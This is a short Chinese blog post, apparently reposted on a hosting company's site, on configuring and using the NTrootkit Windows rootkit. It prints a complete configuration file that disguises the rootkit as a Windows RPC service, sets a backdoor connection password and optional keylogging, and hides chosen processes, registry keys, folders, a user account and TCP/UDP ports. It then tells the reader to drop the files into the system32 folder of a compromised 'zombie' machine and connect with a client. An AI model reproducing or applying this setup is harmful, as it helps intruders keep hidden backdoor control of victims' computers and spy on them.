Rootkit之ntrootkit的配置使用

发布时间:2020-06-03 10:20:35 作者:CircleAgain
来源:网络 阅读:1041

NTrootkit

一,配置方法

\\filename:ntrootkit.ini
\\This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit
\\can't be installed!!!
[GLOBAL]     //下面为配置内容
\\servicename is the ntrootkit 's servicename
servicename=tsserver       //服务名
servdispname=rpcsvr
servdescription=windows system rpc server
installdir=com\sserver      //安装目录
connpass=12345             //连接密码
appname=51cto.exe 
keylog=0                       //0为不记录键盘
workmode=1                  //0为sniffer模式
[HIDDEN PROCNAME]     //要隐藏的服务名

51cto
[HIDDEN REGKEY]    //要隐藏的注册表键

zero\soft\...\...\xxx

[HIDDEN REGVALUE]   //要隐藏的注册表键值

zero\soft\...\...

[HIDDEN FILEDIR]  //要隐藏的文件目录

c:\rootkit

[HIDDEN SERVICE]  //要隐藏的服务名

servicert
[HIDDEN USER]  //要隐藏的用户名

zerosecurity
[HIDDEN TCPPORT]  //要隐藏的tcp端口
tcpport=5768

[HIDDEN UDPPORT]  //要隐藏的udp端口
udpport=4000

 

二,使用方法

       ①:将配置文件 .ini和服务端ntrootkit.exe放入肉鸡的 system32目录下,然后运行ntrootkit.exe安装;ntrootkit -u password 可卸载;

        Rootkit之ntrootkit的配置使用

       ②:客户端用rtclient连接;

        Rootkit之ntrootkit的配置使用

 

推荐阅读:
  1. unix下的 rootkit
  2. Linux下rootkit后门检测工具chkrootkit

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

rootkit 网络安全

上一篇:openstack是什么?openstack的主要功能组件有哪些

下一篇:Windows学习感言

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》